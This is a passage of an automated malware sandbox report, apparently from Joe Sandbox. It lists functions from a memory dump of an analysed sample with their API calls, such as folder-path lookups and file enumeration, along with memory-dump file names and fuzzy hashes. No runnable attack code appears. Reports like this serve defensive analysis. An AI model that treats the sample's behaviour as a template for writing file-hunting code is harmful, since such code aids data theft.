                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                          • Instruction ID: 3bf44bd0f112e297bbf3f7db0b05bc07434180030ad7f62ab24677ce23c8b951
                          • Opcode Fuzzy Hash: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                          • Instruction Fuzzy Hash: D1F037B9E44208BBDB14DBF0DC49B9E77B9BB48720F11C254FA51B72C0DAB0AA018F45
                          Function 0013C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0013C74E
                            • Part of subcall function 0013BF9F: __amsg_exit.LIBCMT ref: 0013BFAF
                          • __getptd.LIBCMT ref: 0013C765
                          • __amsg_exit.LIBCMT ref: 0013C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0013C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                          • Instruction ID: 5de4c3afd4347153f745e81d9ca160f708ee7f81389da08f4b0ff1ec23867815
                          • Opcode Fuzzy Hash: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                          • Instruction Fuzzy Hash: 9FF0B4329083009BE721BBB8588775E37A06F10720F214149F904B72E2DB6459419FD6
                          Function 00134F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134F7A
                          • lstrcat.KERNEL32(?,00141070), ref: 00134F97
                          • lstrcat.KERNEL32(?,00F09738), ref: 00134FAB
                          • lstrcat.KERNEL32(?,00141074), ref: 00134FBD
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                            • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                            • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                            • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                          • Instruction ID: 6fe309fc72df74a1268157b22e813a63da9d0445af8a9607dbc9e3595d2a7f2f
                          • Opcode Fuzzy Hash: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                          • Instruction Fuzzy Hash: 81219B7690021467C755F7B0EC46EED377CAB65300F008598F69AA3191EFB596C88F92